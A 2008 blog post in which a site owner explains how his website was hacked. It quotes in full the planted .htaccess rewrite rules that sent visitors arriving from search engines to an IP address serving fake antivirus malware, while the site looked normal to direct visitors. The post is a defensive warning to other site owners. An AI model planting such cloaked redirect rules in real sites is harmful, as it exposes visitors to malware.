My Website Got Hacked!

An examination of how our website was hacked.

Anybody who was referred to www.RiskyThinking.com (or some other sites) through a search engine was redirected to a Russian malware site for a fake “AntiVirus” scanner. Searching around the net, it appears that other sites hosted at IX Web Hosting (ixwebhosting.com) were also hacked. .

It was quite a cunning plan. For the technically inclined, the “.htaccess” file was replaced with the text

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

which for those who don’t speak Apache (Web Server Dialect), means

Redirect everybody who came here from a search engine to a malware site.

The cunning part being that if I visited my own site from a bookmark, a hyperlink, or by typing in the URL, it should have appeared normal. In fact due to an error, the site crashed, which is how I noticed the problem. A visitor who found the site through a search engine also took the trouble to email me a warning that the site had been hacked – Thanks Paul.

There unfortunately isn’t any way to tell the visitors who got redirected what happened.

I’ve been through my log files, checked the access logs, changed passwords, and concluded the security breech wasn’t due to a security hole in my website or carelessness on my part.

All I can really do now is warn other site owners of this exploit (via this posting), and

I would like to apologize to
people I do not know
and cannot know
for an unknown error
made by an unknown person.

That sounds almost like the poetry of Donald Rumsfeld.

14 November 2008

If you found this article interesting, please consider please consider subscribing to the Risky Thinking Newsletter to get notified when new articles appear. Recently published articles can be found here.

There is also an RSS Feed.

Do you have any comments? I'd like to hear them. Please use the contact form to get in touch.